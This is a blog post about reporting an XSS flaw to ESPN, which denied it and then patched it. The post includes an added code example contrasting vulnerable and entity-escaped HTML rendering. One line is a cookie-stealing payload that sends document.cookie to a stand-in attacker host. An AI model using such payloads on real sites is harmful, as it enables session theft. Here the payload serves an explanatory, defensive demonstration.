I reported a severe XSS vulnerability in ESPN… and they completely denied its existence (Thanks ESPN #0)

Companies have recently made a shift towards offering bug bounty programs to reward responsible researchers for reporting vulnerabilities. You’ve got companies like Google and Facebook that go out of their way to ensure that every facet of their website is secure, and reward hackers who find holes.

There are some companies that don’t offer bug bounty programs, which is completely understandable. When you report a vulnerability to these companies, they’ll be grateful that you disclosed it rather than abusing it.

And then… you’ve got ESPN. Ah, yes, ESPN, who notoriously give not a single concern towards security risks.

Being a responsible white hat hacker, I emailed ESPN about an XSS vulnerability that I discovered. XSS, if you’re unaware, allows an attacker to run their own JavaScript in a victim’s browser in the context of the vulnerable site, which lets the attacker read the user’s cookies (unless they are marked HttpOnly) or make requests as that user, and so compromise their account.
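To make the point concrete, here is an added example (it is not code from the original post and says nothing about ESPN’s actual site): a hypothetical search page that reflects a query parameter into its HTML, first unescaped and then with proper entity encoding, exercised with the `alert(1)` style proof of concept from the screenshot and with the kind of cookie-stealing payload an attacker would send instead. The page markup, the parameter name, and the `attacker.example` collection host are all assumptions.

```javascript
// Added example, not from the original post. Everything here (the page,
// the "q" parameter, attacker.example) is hypothetical.

// Vulnerable: the search term is interpolated straight into the HTML,
// so any markup in it becomes part of the page the browser parses.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Every character with meaning in HTML becomes an entity, so the value
// can only ever be text, never a tag or an attribute.
function escapeHtml(value) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Hardened: same page, but the untrusted value is escaped before use.
function renderSearchSafe(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Constructed payloads. The first is what a researcher sends to prove
// execution (as in the post's screenshot); the second is what an attacker
// sends: it ships document.cookie to a server they control. Note that
// cookies flagged HttpOnly are invisible to document.cookie, in which case
// the attacker would instead issue requests from the victim's browser.
const PROOF_OF_CONCEPT = '<script>alert(1)</script>';
const COOKIE_THEFT =
  `<img src=x onerror="(new Image).src='https://attacker.example/c?'+encodeURIComponent(document.cookie)">`;

// Crude stand-in for "would a browser execute attacker script here?":
// a literal <script> tag, or a literal tag carrying an on* event handler.
// Escaped output never contains a literal '<', so it can never match.
function rendersAttackerScript(html) {
  return /<script[\s>]/i.test(html) || /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Run both payloads through both renderers and report which ones execute.
function demo() {
  const results = {};
  for (const [name, payload] of Object.entries({ PROOF_OF_CONCEPT, COOKIE_THEFT })) {
    results[name] = {
      vulnerable: rendersAttackerScript(renderSearchVulnerable(payload)),
      safe: rendersAttackerScript(renderSearchSafe(payload)),
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
// Both payloads: vulnerable → true, safe → false
```

The check in `rendersAttackerScript` is deliberately simple and only works because entity-encoded output has no literal `<` at all; a real test would load the page in a browser. The fix is the same either way: encode untrusted data for the exact context it lands in (element content here; attributes, URLs and JavaScript strings each need their own encoding).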

To my surprise, they not only refused to acknowledge my help, but went so far as to deny that a vulnerability existed in the first place.

The email in question

That’s right, I responsibly disclosed a vulnerability to ESPN, and they told me that, no, I was wrong, and there was no security risk.

And that was after I provided a screenshot showing the vulnerability, and steps to reproduce it:

Presenting an alert message, demonstrating executing JavaScript client-side

Indeed, after checking back a few days later, ESPN had fixed the vulnerability. So they took my feedback, denied that it existed, and patched the vulnerability anyway.

And what’s that? “We apologize for the confusion”? As if it’s somehow harming my experience that I went out of my way to report this?

That’s it, ESPN. If my vulnerabilities don’t exist, I might as well post them for the internet to see. And, boy, do I have some to disclose…

Read the second installment in “Thanks ESPN”